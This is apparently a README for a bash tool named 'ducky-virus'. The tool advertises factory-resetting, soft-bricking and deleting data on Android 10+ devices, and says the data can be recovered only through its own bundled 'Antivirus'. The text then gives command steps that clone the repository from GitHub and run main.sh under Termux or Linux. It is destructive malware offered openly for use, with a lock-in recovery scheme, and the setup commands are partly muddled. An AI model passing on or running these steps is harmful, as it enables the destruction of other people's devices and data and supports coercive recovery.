Simple Bash script program to Factory reset and soft Brick an Android device (Supports Android 10+), however, the data can be recovered ONLY by the Antivirus provided in the program itself.
- Factory Reset
- Soft brick
- Software reset
- Data Deletion (recoverable)
pkg update && pkg upgrade -y
pkg install git -y
pkg install lolcat
git clone https://github.com/krishealty/ducky-virus
cd $HOME
cd ducky-virus
ls
bash main.sh
sudo apt-get update && pkg upgrade -y
sudo apt-get install git -y
git clone https://github.com/krishealty/ducky-virus
cd ducky-virus
bash main.sh